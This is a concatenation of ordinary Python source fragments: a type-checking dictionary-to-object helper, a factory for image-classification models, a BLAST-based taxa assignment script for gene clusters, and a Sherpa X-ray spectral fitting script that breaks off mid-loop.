        param_names = [param.name for param in signature.parameters.values()]
        argument_names = data.keys()
        superfluous = set(argument_names) - set(param_names)
        if superfluous:
            raise TypeError(f'Superfluous parameters in call: {superfluous}')

    parameter_values = list(signature.parameters.values())
    if first_arg is not None:
        # Constructor call: skip the self/cls parameter
        parameter_values = parameter_values[1:]
    for param in parameter_values:
        if param.kind != inspect.Parameter.POSITIONAL_OR_KEYWORD:
            raise TypeError('Only parameters of kind POSITIONAL_OR_KEYWORD '
                            'supported in target functions.')
        if _is_union_type(param.annotation) \
                and not _is_optional_type(param.annotation):
            raise TypeError('Union members in target function other than Optional '
                            'are not supported.')
        if _is_dict_type(param.annotation):
            raise TypeError('Dict members in target function are not supported.')
        if param.name not in data:
            if _is_optional_type(param.annotation):
                # Missing Optional values default to None
                ctor_params[param.name] = None
            else:
                raise TypeError(f'Key {param.name} is missing.')
        else:
            ctor_params[param.name] = _get_value(param.annotation,
                                                 data[param.name],
                                                 param.name,
                                                 skip_superfluous,
                                                 convert_types)

    if first_arg is not None:
        return _unwrap_decorator_type(func)(first_arg, **ctor_params)
    return _unwrap_decorator_type(func)(**ctor_params)
def _get_value(func: WrappedOrFunc, value: Any, log_name: str,
               skip_superfluous: bool, convert_types: bool) -> Any:
    """Convert a single value into target type if possible.

    :param func: target type annotation for the value
    :param log_name: parameter name, used only for error messages
    :raises TypeError: on missing annotations or unconvertible mismatches
    """
    if _is_list(value):
        return _get_list_value(func, value, log_name,
                               skip_superfluous, convert_types)
    if _is_dict(value):
        return _get_dict_value(func, value)  # Use settings of inner value

    # Concrete types the value may have (Optional unwrapped into its
    # members, undictify decorators unwrapped to their targets)
    allowed_types = list(map(_unwrap_decorator_type, _get_union_types(func) \
        if _is_optional_type(func) \
        else [func]))
    if func is inspect.Parameter.empty and log_name != 'self':
        raise TypeError(f'Parameter {log_name} of target function '
                        'is missing a type annotation.')
    if Any not in allowed_types and log_name != 'self':
        if not _isinstanceofone(value, allowed_types):
            value_type = type(value)
            if convert_types:
                if _is_optional_type(func):
                    func = _get_optional_type(func)
                try:
                    return func(value)
                except ValueError:
                    # NOTE(review): conversions raising TypeError (e.g.
                    # int(None)) propagate unwrapped - consider catching
                    # TypeError here as well.
                    raise TypeError(f'Can not convert {value} '
                                    f'from type {_get_type_name(value_type)} '
                                    f'into type {_get_type_name(func)} '
                                    f'for key {log_name}.')
            raise TypeError(f'Key {log_name} has incorrect type: '
                            f'{_get_type_name(value_type)} instead of '
                            f'{_get_type_name(func)}.')
    return value
def _get_list_value(func: Callable[..., TypeT], value: Any,
                    log_name: str,
                    skip_superfluous: bool, convert_types: bool) -> Any:
    """Type-check every element of a list value against the element type
    of the List (or Optional[List]) annotation *func*.

    :param log_name: parameter name, used only for error messages
    :raises TypeError: when *func* is not a (possibly Optional) List
    """
    if not _is_list_type(func) and \
            not _is_optional_list_type(func):
        raise TypeError(f'No list expected for {log_name}')
    result_elem_type = _get_list_type_elem_type(func)
    # Bug fix: forward the parameter's log name (previously the whole list
    # `value` was passed as log_name, corrupting error messages).
    return [_get_value(result_elem_type, elem, log_name,
                       skip_superfluous, convert_types)
            for elem in value]
def _get_dict_value(func: Callable[..., TypeT], value: Any) -> Any:
    """Instantiate the (possibly Optional) target type from a nested dict."""
    assert _is_dict(value)
    target = _get_optional_type(func) if _is_optional_type(func) else func
    return target(**value)  # type: ignore
def _is_union_type(the_type: Callable[..., TypeT]) -> bool:
    """Return True if the type is a Union."""
    if VER_3_7_AND_UP:
        # PEP 560: on 3.7+ Union[...] is a _GenericAlias whose
        # __origin__ is typing.Union
        return (the_type is Union or
                _is_instance(the_type, _GenericAlias) and _type_origin_is(the_type, Union))
    # Pre-3.7 unions are instances of typing._Union
    return _is_instance(the_type, _Union)
def _is_list_type(the_type: Callable[..., TypeT]) -> bool:
    """Return True if the type is a List."""
    try:
        if VER_3_7_AND_UP:
            return _is_instance(the_type,
                                _GenericAlias) and _type_origin_is(the_type, list)
        return issubclass(the_type, List)  # type: ignore
    except TypeError:
        # issubclass raises TypeError for non-class arguments
        return False
def _is_optional_list_type(the_type: Callable[..., TypeT]) -> bool:
    """Return True if the type is a List or an Optional[List]."""
    return _is_list_type(the_type) or (
        _is_optional_type(the_type)
        and _is_list_type(_get_optional_type(the_type)))
def _is_dict_type(the_type: Callable[..., TypeT]) -> bool:
    """Return True if the type is a Dict."""
    try:
        if VER_3_7_AND_UP:
            return _is_instance(the_type,
                                _GenericAlias) and _type_origin_is(the_type, dict)
        return issubclass(the_type, Dict)  # type: ignore
    except TypeError:
        # issubclass raises TypeError for non-class arguments
        return False
def _type_origin_is(the_type: Callable[..., TypeT], origin: Any) -> bool:
assert hasattr(the_type, '__origin__')
return the_type.__origin__ is origin # type: ignore
def _get_union_types(union_type: Callable[..., TypeT]) -> List[Callable[..., TypeT]]:
    """Return all types a Union can hold."""
    assert _is_union_type(union_type)
    # __args__ holds the Union's member types
    return union_type.__args__  # type: ignore
def _get_optional_type(optional_type: Callable[..., TypeT]) -> Type[TypeT]:
    """Return the type an Optional can hold."""
    assert _is_optional_type(optional_type)
    args = optional_type.__args__  # type: ignore
    assert len(args) == 2
    # Optional[X] == Union[X, NoneType]; _is_optional_type guarantees
    # NoneType is the second member, so the wrapped type is args[0]
    return args[0]  # type: ignore
def _get_type_name(the_type: Callable[..., TypeT]) -> str:
    """Return a printable name of a type.

    Optional and List annotations are rendered with their inner type;
    everything else falls back to __name__.
    """
    if _is_optional_type(the_type):
        return f'Optional[{str(_get_optional_type(the_type).__name__)}]'
    if _is_list_type(the_type):
        return f'List[{str(_get_list_type_elem_type(the_type).__name__)}]'
    return the_type.__name__
def _get_list_type_elem_type(list_type: Callable[..., TypeT]) -> Callable[..., Any]:
    """Return the type of a single element of the list type."""
    if _is_optional_type(list_type):
        # Optional[List[X]]: unwrap to the inner List first
        list_type = _get_optional_type(list_type)
    assert _is_list_type(list_type)
    list_args = list_type.__args__  # type: ignore
    assert len(list_args) == 1
    return list_args[0]  # type: ignore
def _isinstanceofone(value: Callable[..., TypeT], types: List[Callable[..., TypeT]]) -> bool:
    """Return True if *value* is an instance of at least one given type.

    Union members are expanded recursively.
    """
    for candidate in types:
        if _is_union_type(candidate) and \
                _isinstanceofone(value, _get_union_types(candidate)):
            return True
        try:
            if _is_instance(value, candidate):  # type: ignore
                return True
        except TypeError:
            # isinstance() rejects bare typing constructs - treat as no match
            pass
    return False
def _is_optional_type(the_type: Callable[..., TypeT]) -> bool:
    """Return True if the type is an Optional."""
    if not _is_union_type(the_type):
        return False
    union_args = _get_union_types(the_type)
    # Optional[X] is exactly Union[X, NoneType]: two members, with the
    # NoneType member in the final position
    return len(union_args) == 2 and _is_instance(None, union_args[1])
def _is_dict(value: TypeT) -> bool:
"""Return True if the value is a dictionary."""
return isinstance(value, dict)
def _is_list(value: TypeT) -> bool:
"""Return True if the value is a list."""
return isinstance(value, list)
def _unwrap_decorator_type(func: WrappedOrFunc) -> Callable[..., Any]:
    """Get the actual type returned by the internal wrapper.

    Unwrapped callables are returned unchanged.
    """
    return getattr(func, '__undictify_wrapped_func__', func)  # type: ignore
def _is_instance(value: TypeT, the_type: Callable[..., TypeT]) -> bool:
    # Thin isinstance wrapper: centralises the single type: ignore needed
    # when checking against typing constructs.
    return isinstance(value, the_type)  # type: ignore
|
import torchvision.models
from .resnext101_32x4d import resnext101_32x4d
from .inception_v4 import inception_v4
from .inception_resnet_v2 import inception_resnet_v2
from .wrn50_2 import wrn50_2
from .my_densenet import densenet161, densenet121, densenet169, densenet201
from .my_resnet import resnet18, resnet34, resnet50, resnet101, resnet152
from .fbresnet200 import fbresnet200
from .dpn import dpn68, dpn68b, dpn92, dpn98, dpn131, dpn107
from .transformed_model import TransformedModel
from .load_checkpoint import load_checkpoint
# Maps each supported model name to the input-normalization family its
# weights expect (used when no explicit normalizer is supplied).
model_name_normalizer_name_mapping = {
    'dpn68': 'dualpathnet',
    'dpn68b': 'dualpathnet',
    'dpn92': 'dualpathnet',
    'dpn98': 'dualpathnet',  # fix: was missing although create_model supports dpn98
    'dpn131': 'dualpathnet',
    'dpn107': 'dualpathnet',
    'resnet18': 'torchvision',
    'resnet34': 'torchvision',
    'resnet50': 'torchvision',
    'resnet101': 'torchvision',
    'resnet152': 'torchvision',
    'resnet18-torchvision': 'torchvision',
    'resnet34-torchvision': 'torchvision',
    'resnet50-torchvision': 'torchvision',
    'resnet101-torchvision': 'torchvision',
    'resnet152-torchvision': 'torchvision',
    'densenet121': 'torchvision',
    'densenet161': 'torchvision',
    'densenet169': 'torchvision',
    'densenet201': 'torchvision',
    'densenet121-torchvision': 'torchvision',
    'densenet161-torchvision': 'torchvision',
    'densenet169-torchvision': 'torchvision',
    'densenet201-torchvision': 'torchvision',
    'squeezenet1_0': 'torchvision',
    'squeezenet1_1': 'torchvision',
    'alexnet': 'torchvision',
    'inception_v3': 'le',
    'inception_resnet_v2': 'le',
    'inception_v4': 'le',
    'resnext101_32x4d': 'torchvision',
    'wrn50': 'torchvision',
    'fbresnet200': 'torchvision'
}
def create_model(
        model_name='resnet50',
        pretrained=False,
        num_classes=1000,
        input_size=0,
        normalizer='',
        drop_first_class=False,
        output_fn='',
        checkpoint_path='',
        **kwargs):
    """Instantiate a model architecture by name.

    Args:
        model_name: key selecting one of the supported architectures.
        pretrained: load pretrained weights where supported.
        num_classes: number of output classes (the squeezenet/alexnet
            branches ignore this and use the torchvision default).
        input_size: if non-zero, the model is wrapped in a TransformedModel.
        normalizer: input normalizer name; also triggers wrapping.
        drop_first_class: drop class 0 from outputs; also triggers wrapping.
        output_fn: output activation name; also triggers wrapping.
        checkpoint_path: checkpoint to load (only when not pretrained).
        **kwargs: forwarded to the underlying constructor. 'test_time_pool'
            is popped here and passed only to the DPN variants
            (default True).

    Returns:
        The constructed (and possibly TransformedModel-wrapped) model.

    Raises:
        ValueError: if model_name is not recognized.
            Fix: this used to be `assert False and "Invalid model"`, which
            never displays its message and is stripped under `python -O`
            (falling through to a NameError on `model`).
    """
    test_time_pool = kwargs.pop('test_time_pool', True)
    if model_name == 'dpn68':
        model = dpn68(
            num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
    elif model_name == 'dpn68b':
        model = dpn68b(
            num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
    elif model_name == 'dpn92':
        model = dpn92(
            num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
    elif model_name == 'dpn98':
        model = dpn98(
            num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
    elif model_name == 'dpn131':
        model = dpn131(
            num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
    elif model_name == 'dpn107':
        model = dpn107(
            num_classes=num_classes, pretrained=pretrained, test_time_pool=test_time_pool)
    elif model_name == 'resnet18':
        model = resnet18(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'resnet18-torchvision':
        model = torchvision.models.resnet18(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'resnet34':
        model = resnet34(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'resnet34-torchvision':
        model = torchvision.models.resnet34(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'resnet50':
        model = resnet50(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'resnet50-torchvision':
        model = torchvision.models.resnet50(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'resnet101':
        model = resnet101(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'resnet101-torchvision':
        model = torchvision.models.resnet101(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'resnet152':
        model = resnet152(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'resnet152-torchvision':
        model = torchvision.models.resnet152(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'densenet121':
        model = densenet121(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'densenet121-torchvision':
        model = torchvision.models.densenet121(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'densenet161':
        model = densenet161(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'densenet161-torchvision':
        model = torchvision.models.densenet161(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'densenet169':
        model = densenet169(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'densenet169-torchvision':
        model = torchvision.models.densenet169(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'densenet201':
        model = densenet201(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'densenet201-torchvision':
        model = torchvision.models.densenet201(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'inception_v3':
        # aux_logits disabled so the model has a single output head
        model = torchvision.models.inception_v3(
            num_classes=num_classes, pretrained=pretrained, transform_input=False, aux_logits=False)
    elif model_name == 'inception_resnet_v2':
        model = inception_resnet_v2(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'inception_v4':
        model = inception_v4(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'resnext101_32x4d':
        model = resnext101_32x4d(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'wrn50':
        model = wrn50_2(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'fbresnet200':
        model = fbresnet200(num_classes=num_classes, pretrained=pretrained, **kwargs)
    elif model_name == 'squeezenet1_0':
        model = torchvision.models.squeezenet1_0(pretrained=pretrained)
    elif model_name == 'squeezenet1_1':
        model = torchvision.models.squeezenet1_1(pretrained=pretrained)
    elif model_name == 'alexnet':
        model = torchvision.models.alexnet(pretrained=pretrained)
    else:
        raise ValueError('Invalid model name: %s' % model_name)
    if checkpoint_path and not pretrained:
        load_checkpoint(model, checkpoint_path)
    if input_size or normalizer or drop_first_class or output_fn:
        model = TransformedModel(
            model=model,
            input_size=input_size,
            normalizer=normalizer,
            output_fn=output_fn,
            drop_first_class=drop_first_class,
        )
    return model
def create_model_from_cfg(mc, checkpoint_path=''):
    """Build a model from a configuration mapping.

    Args:
        mc: mapping with keys 'model_name', 'num_classes', 'input_size',
            'normalizer', 'output_fn', 'drop_first_class',
            'checkpoint_file', and optionally 'kwargs'.
        checkpoint_path: overrides mc['checkpoint_file'] when non-empty.

    Returns:
        The model built by create_model().
    """
    # Fix: read the optional kwargs without mutating the caller's dict
    # (the original wrote mc['kwargs'] = {} back into mc as a side effect).
    extra_kwargs = mc.get('kwargs') or {}
    return create_model(
        model_name=mc['model_name'],
        num_classes=mc['num_classes'],
        input_size=mc['input_size'],
        normalizer=mc['normalizer'],
        output_fn=mc['output_fn'],
        drop_first_class=mc['drop_first_class'],
        checkpoint_path=checkpoint_path if checkpoint_path else mc['checkpoint_file'],
        **extra_kwargs
    )
|
#!/bin/env python
"""
Created on Thurs Mar 3 20:01:31 2016
@author: francinecamacho
"""
from Bio import SeqIO
import pandas as pd
import os
"""This script will take the tabular file as input to detect BGCs based on percent identity (95%)
and query coverage (95%) criteria to find the BGC taxa producer based on ref_seq NCBI database. The output
is a tabular result file with BGC name, percent identity, and coverage and taxa name.
"""
#Function to make a panda data frame tabular file
# Function to load the BLAST tabular output into a pandas data frame.
def makeDataFrame(PATH, perc_ident_cutoff, coverage_cutoff):
    """Read a BLAST tabular file and keep only hits that pass both the
    query-coverage and percent-identity cutoffs."""
    column_names = ['seqid', 'stitle', 'sacc', 'qseqid', 'qlen',
                    'qcovs', 'pident', 'Evalue', 'qstart', 'qend']
    frame = pd.read_csv(PATH, sep="\t", names=column_names, header=None)
    passes_cutoffs = (frame.qcovs >= coverage_cutoff) & (frame.pident >= perc_ident_cutoff)
    return frame[passes_cutoffs]
def initializeDict(bgc_list):
    """Map every BGC identifier to the placeholder string 'N/A'."""
    return {bgc: 'N/A' for bgc in bgc_list}
def mapTaxa(df, species_dict):
    """Fill species_dict with [taxa, accession, pident, qcovs] per BGC.

    For every BLAST hit row the BGC's entry is overwritten (so the last
    hit in the frame wins); BGCs with no hit keep a four-field 'N/A'
    placeholder. The dict is mutated in place and also returned.
    """
    for _, row in df.iterrows():
        taxa_label = row['stitle'].replace(" ", "_")
        species_dict[row['qseqid']] = [
            taxa_label, row['sacc'], row['pident'], row['qcovs']
        ]
    for bgc_id, entry in species_dict.items():
        if entry == 'N/A':
            species_dict[bgc_id] = ['N/A', 'N/A', '0.0', '0.0']
    return species_dict
# def updateFASTA(species_dict, fasta_file, outdir, outfile):
# os.chdir(outdir)
# bgc_fasta_file = SeqIO.parse(open(fasta_file),'fasta')
# with open(outfile, 'w') as updated_fasta:
# for seq_record in bgc_fasta_file:
# seq_id = seq_record.id
# if species_dict[seq_id][0]!= 'N/A':
# seq_record.id = seq_id + "__" + species_dict[seq_id][0]
# seq_record.description = ""
# SeqIO.write(seq_record, updated_fasta, "fasta")
# else:
# seq_record.description = ""
# SeqIO.write(seq_record, updated_fasta, "fasta")
def main(tabular_file, bgc_fasta_file, outdir, outfile, perc_ident_cutoff, coverage_cutoff):
    """Assign a taxa producer to each BGC and write a tabular result file.

    Args:
        tabular_file: BLAST tabular output path.
        bgc_fasta_file: FASTA file of BGC sequences (defines the BGC ids).
        outdir: directory to write into; may be None (cwd is then used).
        outfile: name of the tab-separated output file.
        perc_ident_cutoff: minimum percent identity to accept a hit.
        coverage_cutoff: minimum query coverage to accept a hit.
    """
    blast_df = makeDataFrame(tabular_file, perc_ident_cutoff, coverage_cutoff)
    bgc_list = [record.id for record in SeqIO.parse(bgc_fasta_file, "fasta")]
    bgc_dict = initializeDict(bgc_list)
    print(bgc_dict)
    species_result_dict = mapTaxa(blast_df, bgc_dict)
    rows = [(k, v[0], v[1], v[2], v[3]) for k, v in species_result_dict.items()]
    # Fix: build the frame directly with its column names. The original
    # used DataFrame.append (removed in pandas 2.0) and assigned the five
    # column names afterwards, which also crashed when there were no BGCs.
    output_df = pd.DataFrame(
        rows, columns=["BGC_NAME", "TAXA_NAME", "ACC_ID", "PERC_IDENT", "COVERAGE"])
    # Fix: --outdir is optional; only change directory when one was given
    # (os.chdir(None) raises TypeError).
    if outdir:
        os.chdir(outdir)
    output_df.to_csv(outfile, index=False, sep='\t')  # tab-separated text output
    # updateFASTA(species_result_dict, bgc_fasta_file, outdir, outfile)
if __name__ == '__main__':
    # Command-line driver: all cutoffs default to 95 (percent).
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('--tabular_file', type =str, required=True)
    parser.add_argument('--bgc_fasta_file', type =str, required=True)
    # --outdir is optional and has no default; downstream code must
    # handle a None value.
    parser.add_argument('--outdir', type= str)
    parser.add_argument('--outfile', type= str, required=True)
    parser.add_argument('--perc_ident_cutoff', type= int, required=False, default=95)
    parser.add_argument('--coverage_cutoff', type= int, required=False, default=95)
    args = parser.parse_args()
    main(args.tabular_file, args.bgc_fasta_file, args.outdir, args.outfile, args.perc_ident_cutoff, args.coverage_cutoff)
import glob as gl
from astropy.io import ascii
from astropy.table import Table
from astropy.io import fits
from astropy.time import Time
import os
import numpy as np
import matplotlib
matplotlib.use('Qt5Agg')
import matplotlib.pyplot as plt
import pandas as pd
# plotting the spectra, must be corrected :
def create_plots(components, x_max, x_min, ymax, ymin,index):
    """Plot the current Sherpa fit and overplot its model components.

    Saves four files into the burst folder:
    <burst_folder>_b<bid>_m<index>_full.{pdf,png} (fit + residuals) and
    ..._full_comp.{pdf,png} (fit with components).

    Relies on module-level globals (source_name, bid, mjdobs,
    burst_folder) and on Sherpa plotting functions (plot_fit_delchi,
    plot_fit, plot_model_component) being in scope -- presumably from a
    `from sherpa.astro.ui import *` outside this chunk; confirm.

    Args:
        components: component tags to overplot, e.g. ["db1", "po1"].
        x_max, x_min, ymax, ymin: axis limits.
        index: model index used in the output file names.
    """
    print('Now Plotting the Spectrum')
    # Fit plus delta-chi residual panel.
    plot_fit_delchi(1,clearwindow=True, color='Black')
    fig=plt.gcf()
    ax1,ax2=fig.axes
    ax1.set_title(source_name+' BID:'+str(bid)+' MJD:'+str(mjdobs)+' Model:'+str(components))
    ax1.set_yscale('log')
    ax1.set_xscale('log')
    ax2.set_xscale('log')
    ax2.set_xlabel('Energy [keV]', fontsize=14)
    ax1.set_ylabel('Counts/sec/keV', fontsize=14)
    ax2.set_ylabel('Sigma', fontsize=14)
    ax1.set_xlim(x_min,x_max)
    ax2.set_xlim(x_min,x_max)
    plt.savefig(burst_folder+'_b'+str(bid)+'_m'+str(index)+'_full.pdf',orientation='landscape', papertype='a4')
    plt.savefig(burst_folder+'_b'+str(bid)+'_m'+str(index)+'_full.png',orientation='landscape', papertype='a4')
    # Second figure: fit with each absorbed model component overplotted.
    plot_fit(1,clearwindow=True,xlog=True,ylog=True, color='Black')
    if "db1" in components:
        plot_model_component("nh*db1", replot=False, overplot=True, color='Green')
    if "po1" in components:
        plot_model_component("nh*po1", replot=False, overplot=True, color='Red')
    if "bb1" in components:
        plot_model_component("nh*bb1", replot=False, overplot=True, color='Black')
    if "g1" in components:
        plot_model_component("nh*g1", replot=False, overplot=True, color='Blue')
    if "comp1" in components:
        plot_model_component("nh*comp1", replot=False, overplot=True, color='Orange')
    plt.title(source_name+' BID:'+str(bid)+' MJD:'+str(mjdobs)+' Model:'+str(components))
    plt.xlabel('Energy [keV]', fontsize=14)
    plt.ylabel('Counts/sec/keV', fontsize=14)
    plt.xlim(x_min,x_max)
    plt.ylim(ymin,ymax)
    plt.savefig(burst_folder+'_b'+str(bid)+'_m'+str(index)+'_full_comp.pdf',orientation='landscape', papertype='a4')
    plt.savefig(burst_folder+'_b'+str(bid)+'_m'+str(index)+'_full_comp.png',orientation='landscape', papertype='a4')
    print('Spectra Plotted and files are created')
# first the constants :
source_name = 'Aql_X-1'
# enter here the burstid of the burst you would like to fit :
bid = '22'
# Interactive energy range; `mines`/`maxes` are Sherpa ignore() range
# strings of the form ":<min>" and "<max>:".
mine=input('Enter the minimum energy of the fits :')
mines = ":"+mine
maxe=input('Enter the maximum energy of the fits :')
maxes = maxe+":"
# Analysis directory layout (hard-coded to this machine).
folder = '/home/hea/ownCloud/burst_characterization_v4/'
sfolder = '/home/hea/ownCloud/burst_characterization_v4/scripts/'
burst_folder=folder+source_name+'/burst'+bid+'/'
#pers_folder = burst_folder+'/pers_analysis/'
#bkgfile = gl.glob(pers_folder+'*3c50*.pha.pi')
bkgfile = gl.glob(burst_folder+'*3c50*.pha.pi')
pre_post='pre_pers.pha'
# Sherpa session configuration. These functions are presumably provided by
# a `from sherpa.astro.ui import *` done outside this chunk -- confirm.
set_stat("chi2xspecvar")
set_covar_opt("sigma",1.0)
set_conf_opt('numcores', 20)
set_conf_opt("max_rstat",250.0)
set_covar_opt('sigma',1.0)  # NOTE(review): duplicate of the call two lines up
'''
(xstbabs.nh * (xsdiskbb.db1 + xspowerlaw.p1))
Param Type Value Min Max Units
----- ---- ----- --- --- -----
nh.nH thawed 1 0 100000 10^22 atoms / cm^2
db1.Tin thawed 1 0 1000 keV
db1.norm thawed 1 0 1e+24
po1.PhoIndex thawed 1 -2 9
po1.norm thawed 1 0 1e+24
(xstbabs.nh * ((xsdiskbb.db1 + xspowerlaw.p1) + xsgaussian.g1))
Param Type Value Min Max Units
----- ---- ----- --- --- -----
nh.nH thawed 1 0 100000 10^22 atoms / cm^2
db1.Tin thawed 1 0 1000 keV
db1.norm thawed 1 0 1e+24
po1.PhoIndex thawed 1 -2 9
po1.norm thawed 1 0 1e+24
g1.LineE thawed 6.5 0 1e+06 keV
g1.Sigma thawed 0.1 0 10 keV
g1.norm thawed 1 0 1e+24
(xstbabs.nh * (xsdiskbb.db1 + xsbbodyrad.bb1))
Param Type Value Min Max Units
----- ---- ----- --- --- -----
nh.nH thawed 1 0 100000 10^22 atoms / cm^2
db1.Tin thawed 1 0 1000 keV
db1.norm thawed 1 0 1e+24
bb1.kT thawed 3 0.001 100 keV
bb1.norm thawed 1 0 1e+24
(xstbabs.nh * ((xsdiskbb.db1 + xsbbodyrad.bb1) + xsgaussian.g1))
Param Type Value Min Max Units
----- ---- ----- --- --- -----
nh.nH thawed 1 0 100000 10^22 atoms / cm^2
db1.Tin thawed 1 0 1000 keV
db1.norm thawed 1 0 1e+24
bb1.kT thawed 3 0.001 100 keV
bb1.norm thawed 1 0 1e+24
g1.LineE thawed 6.5 0 1e+06 keV
g1.Sigma thawed 0.1 0 10 keV
g1.norm thawed 1 0 1e+24
(xstbabs.nh * xscomptt.comp1)
Param Type Value Min Max Units
----- ---- ----- --- --- -----
nh.nH thawed 1 0 100000 10^22 atoms / cm^2
comp1.redshift frozen 0 -0.999 10
comp1.T0 thawed 0.1 0.01 100 keV
comp1.kT thawed 50 2 500 keV
comp1.taup thawed 1 0.01 100
comp1.approx frozen 1 0 5
comp1.norm thawed 1 0 1e+24
'''
# the models to be fit, these are also individual cases :
models = ['xstbabs.nh*(xsdiskbb.db1+xspowerlaw.po1)',
'xstbabs.nh*(xsdiskbb.db1+xspowerlaw.po1+xsgaussian.g1)',
'xstbabs.nh*(xsdiskbb.db1+xsbbodyrad.bb1)','xstbabs.nh*(xsdiskbb.db1+xsbbodyrad.bb1+xsgaussian.g1)'
,'xstbabs.nh*(xscomptt.comp1)']
# the columns of the resulting table can be :
# Source Name, BurstID, MJD, DATEOBS, EXP, PRE/POST, model_name, NH, minNH, maxNH, Tin/T0, minTin, maxTin, dbb_norm, mindbb_norm, maxdbb_norm,
# phoind/bb1kT/compkT, minphoind, maxphoind, pow_norm, minpow_norm, maxpow_norm, g1lineE,ming1lineE, maxg1lineE, g1sigma, ming1sigma, maxg1sigma, g1norm, ming1norm, maxg1norm,
# comptau, mincomptau, maxcomptau, compnorm, mincompnorm, maxcompnorm, total_flux, mintotal_flux, max_total_flux, mine, maxe, chi2, dof, rchi
col_names = ["Source Name", "BurstID", "MJD", "DATEOBS", "EXP",\
"PRE/POST", "model_name", "NH", "minNH", "maxNH","Tin/T0",\
"minTin", "maxTin", "dbb_norm", "mindbb_norm", \
"maxdbb_norm", "phoind/bb1kT/compkT", "minphoind", "maxphoind", \
"pow_norm", "minpow_norm", "maxpow_norm", "g1lineE", "ming1lineE",\
"maxg1lineE", "g1sigma", "ming1sigma", "maxg1sigma",\
"g1norm", "ming1norm", "maxg1norm", "comptau",\
"mincomptau", "maxcomptau", "total_flux",\
"mintotal_flux", "maxtotal_flux", "mine", "maxe","chi2", "dof", "rchi2"]
# definition of the dictionary to keep the best fit parameters :
data_frame = {col: [0]*len(models) for col in col_names}
# Fit each candidate model to the pre-burst persistent spectrum and record
# best-fit values, confidence bounds and fluxes into data_frame.
# NOTE(review): relies on Sherpa session functions (load_pha, fit, conf,
# sample_flux, ...) and model components (nh, db1, po1, bb1, g1, comp1)
# being available in the global namespace -- confirm the import context.
for i in range(len(models)):
    # first lets try the pre spectrum :
    spec = gl.glob(burst_folder+pre_post)
    sp_hdu = fits.open(spec[0])
    print('read src spec: '+str(spec[0]))
    # Observation metadata from the spectrum FITS header.
    mjdobs = sp_hdu[1].header['MJD-OBS']
    date_obsi = sp_hdu[1].header['DATE-OBS']
    exposure = sp_hdu[1].header['EXPOSURE']
    obsid = sp_hdu[1].header['OBS_ID']  # NOTE(review): obsid is never used below
    date_obs = str(Time(date_obsi,format='isot', scale='utc'))
    data_frame["Source Name"][i]=source_name
    data_frame["BurstID"][i] = bid
    data_frame["MJD"][i] = mjdobs
    data_frame["DATEOBS"][i] = date_obs
    data_frame["EXP"][i]=exposure
    data_frame["mine"][i] = mine
    data_frame["maxe"][i] = maxe
    data_frame["PRE/POST"][i] = pre_post
    data_frame["model_name"][i]=models[i]
    # first for the pre burst spectrum :
    load_pha(1, str(spec[0]),use_errors=True)
    load_arf(1, sfolder+'nixtionaxis20170601_combined_v004_1434.arf')
    load_rmf(1, sfolder+'nixti20170601_combined_v002_1434.rmf')
    #load_arf(1, sfolder+'nixtionaxis20170601_combined_v004.arf')
    #load_rmf(1, sfolder+'nixti20170601_combined_v002.rmf')
    load_bkg(1, bkgfile[0],use_errors=True)
    subtract()
    print('This script only subtracts ni3C50 background')
    print('Ignoring : '+mines+' '+maxes)
    ignore(mines+','+maxes)
    print('Grouping the data to have at least 50 counts per channel')
    group_counts(1, 50)
    plot_data()
    # Axis limits padded by 5% (x, y-min) / 20% (y-max) around the data.
    x_max=max(get_data_plot().x)+max(get_data_plot().x)*0.05
    x_min = np.abs(min(get_data_plot().x)-min(get_data_plot().x)*0.05)
    ymax = max(get_data_plot().y)+max(get_data_plot().y)*0.2
    ymin = np.abs(min(get_data_plot().y)-min(get_data_plot().y)*0.05)
    set_source(models[i])
    if i == 4:
        # comptt-only model: freeze redshift/approx, thaw the rest.
        comp1.redshift=0.0
        freeze(comp1.redshift)
        comp1.approx=1.1
        freeze(comp1.approx)
        thaw(comp1.T0)
        thaw(comp1.kT)
        thaw(comp1.norm)
        comp1.norm=1e-2
    if ((i == 1) or (i == 3)):
        # Gaussian line constrained to the Fe-K band (6-7 keV).
        g1.LineE = 6.4
        g1.Sigma.min=0.01
        g1.Sigma.max=0.7
        g1.norm=1e-3
        g1.LineE.min=6.0
        g1.LineE.max=7.0
    # Initial fit with absorption and disk temperature frozen, then thawed.
    # NOTE(review): for i==4 the model has no db1 component; these db1
    # settings presumably act on the component left over from the previous
    # iteration -- confirm this is intended.
    nh.nH=1.0
    freeze(nh.nh)
    db1.Tin=0.8
    freeze(db1.Tin)
    fit()
    thaw(nh.nH)
    thaw(db1.Tin)
    # Global search (moncar) followed by a local refinement (levmar).
    set_method('moncar')
    fit()
    set_method('levmar')
    fit()
    conf()
    # Record fit statistics and confidence bounds.
    chi = get_fit_results().statval
